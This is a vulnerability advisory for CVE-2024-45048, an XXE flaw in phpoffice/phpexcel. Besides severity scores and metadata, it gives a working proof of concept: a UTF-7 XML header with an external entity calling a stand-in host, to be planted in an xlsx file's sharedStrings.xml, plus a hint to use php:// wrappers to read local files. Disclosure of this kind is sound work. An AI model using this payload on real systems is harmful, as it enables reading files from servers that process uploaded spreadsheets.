CVE-2024-45048 – phpoffice/phpexcel

Package

Manager: composer
Name: phpoffice/phpexcel
Vulnerable Version: >=0 <=1.8.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00051 pctl0.15667

Details

XXE in PHPSpreadsheet encoding is returned ### Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) ### Details Check ` $pattern = '/encoding="(.*?)"/';` easy to bypass. Just use a single quote symbol `'`. So payload looks like this: ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> ``` If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. ### PoC 1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode. 4) Replace `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` to ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]> ``` 5) Save `sharedStrings.xml` file and rename zip back to xlsx. 6) Use minimal php code that simply opens this xlsx file: ``` use PhpOffice\PhpSpreadsheet\IOFactory; require __DIR__ . '/vendor/autoload.php'; $spreadsheet = IOFactory::load("file.xlsx"); ``` 7) You will receive the request to your `http://%webhook%/file.dtd` 8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files. ### Impact Read local files 

Metadata

Created: 2024-08-29T17:58:27Z
Modified: 2025-03-06T18:10:41Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-ghg6-32f9-2jp7/GHSA-ghg6-32f9-2jp7.json
CWE IDs: ["CWE-611"]
Alternative ID: GHSA-ghg6-32f9-2jp7
Finding: F083
Auto approve: 1